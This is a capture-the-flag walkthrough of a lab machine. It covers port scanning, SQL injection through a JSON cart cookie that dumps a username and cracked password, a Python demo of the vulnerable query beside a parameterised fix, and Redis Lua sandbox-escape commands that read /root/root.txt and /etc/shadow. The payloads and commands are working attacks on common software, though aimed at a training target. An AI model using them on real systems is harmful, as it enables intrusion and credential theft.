$ nmap -sC -sV -Pn 10.10.11.172
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 13:19 CST
Nmap scan report for 10.10.11.172
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 91:e8:35:f4:69:5f:c2:e2:0e:27:46:e2:a6:b6:d8:65 (RSA)
|   256 cf:fc:c4:5d:84:fb:58:0b:be:2d:ad:35:40:9d:c3:51 (ECDSA)
|_  256 a3:38:6d:75:09:64:ed:70:cf:17:49:9a:dc:12:6d:11 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-title: Did not follow redirect to http://shared.htb
|_http-server-header: nginx/1.18.0
443/tcp open  ssl/http nginx 1.18.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US
| Not valid before: 2022-03-20T13:37:14
|_Not valid after:  2042-03-15T13:37:14
| tls-nextprotoneg:
|   h2
|_  http/1.1
| tls-alpn:
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.58 seconds
shared.htb
Port 80 redirects to shared.htb, so the name needs a hosts entry:
10.10.11.172 shared.htb
The site is a web shop. After adding an item to the cart, checkout is handled by a second subdomain:
checkout.shared.htb
Add that to hosts as well and continue the flow:
10.10.11.172 shared.htb checkout.shared.htb
Note that the cart contents are stored client-side, in a cookie, as a JSON object whose keys are the product identifiers.
SQL injection
Edit the cookie, reload the checkout page, and the product key turns out to be injectable. A basic UNION probe with three columns:
{"' and 0=1 union select 1,2,3-- -":"1"}
From there it is the usual step-by-step extraction (current database, its tables, then the user table's columns), with the result of each query reflected in the page:
{"' and 0=1 union select 1,database(),3-- -":"1"}   -> checkout
{"' and 0=1 union select 1,table_name,table_schema from information_schema.tables where table_schema='checkout'-- -":"1"}   -> user
{"' and 0=1 union select 1,username,2 from checkout.user-- -":"1"}   -> james_mason
{"' and 0=1 union select 1,password,2 from checkout.user-- -":"1"}   -> fc895d4eddc2fc12f995e18c865cf273   # cracks to Soleil101
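To make the injection concrete, here is an added example that is not part of the original writeup and not the box's real checkout code: a constructed, in-memory SQLite stand-in for the checkout database (table and column names `product`, `checkout.user`, `username`, `password` are assumptions), a lookup that builds its query with string formatting exactly as the vulnerable page must, and the same lookup with a bound parameter. The page's UNION payload is fed in unchanged through a URL-encoded JSON cookie. The MySQL-specific enumeration steps (`database()`, `information_schema`) have no SQLite equivalent, so only the final extraction step is reproduced.

```python
import json
import sqlite3
from urllib.parse import quote, unquote


def build_db():
    """Constructed stand-in for the shop's database (assumed schema, not the real one)."""
    conn = sqlite3.connect(":memory:")
    # A second in-memory database attached as "checkout" lets the page's
    # schema-qualified reference checkout.user be used verbatim.
    conn.execute("ATTACH DATABASE ':memory:' AS checkout")
    conn.execute("CREATE TABLE product (code TEXT PRIMARY KEY, name TEXT, price INTEGER)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?, ?)",
        [("A1", "Widget", 10), ("B2", "Gadget", 25)],
    )
    conn.execute("CREATE TABLE checkout.user (id INTEGER, username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO checkout.user VALUES (1, 'james_mason', 'fc895d4eddc2fc12f995e18c865cf273')"
    )
    conn.commit()
    return conn


def make_cart_cookie(cart):
    """Encode a {product_code: quantity} dict as a browser would send the cookie value."""
    return quote(json.dumps(cart))


def checkout_vulnerable(conn, cookie_value):
    """Cart lookup that interpolates the cookie key into SQL: the key is executed as SQL."""
    cart = json.loads(unquote(cookie_value))
    rows = []
    for code in cart:
        query = f"SELECT code, name, price FROM product WHERE code='{code}'"
        rows.extend(conn.execute(query).fetchall())
    return rows


def checkout_fixed(conn, cookie_value):
    """Same lookup with a bound parameter: the key is only ever compared as data."""
    cart = json.loads(unquote(cookie_value))
    rows = []
    for code in cart:
        rows.extend(
            conn.execute("SELECT code, name, price FROM product WHERE code=?", (code,)).fetchall()
        )
    return rows


if __name__ == "__main__":
    db = build_db()
    honest = make_cart_cookie({"A1": "2"})
    payload = make_cart_cookie({"' and 0=1 union select 1,username,2 from checkout.user-- -": "1"})
    print(checkout_vulnerable(db, honest))   # the real product row
    print(checkout_vulnerable(db, payload))  # (1, 'james_mason', 2): username lands in the name column
    print(checkout_fixed(db, payload))       # []: no product has that literal code
```

The `0=1` in the payload empties the left-hand SELECT so the UNION row is the only one rendered, which is why the username shows up where the product name normally sits; the three-column shape was established by the earlier `union select 1,2,3` probe.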
Root is reached through Redis. The commands below are EVAL scripts run from redis-cli (the trailing 0 is the number of keys). Redis's Lua sandbox does not expose the io library, but package.loadlib is reachable, so the script loads luaopen_io from the system liblua5.1.so.0, obtains io.popen, and runs a shell command with the privileges of the redis-server process, which here can read /root/root.txt and /etc/shadow:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /root/root.txt", "r"); local res = f:read("*a"); f:close(); return res' 0
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/shadow", "r"); local res = f:read("*a"); f:close(); return res' 0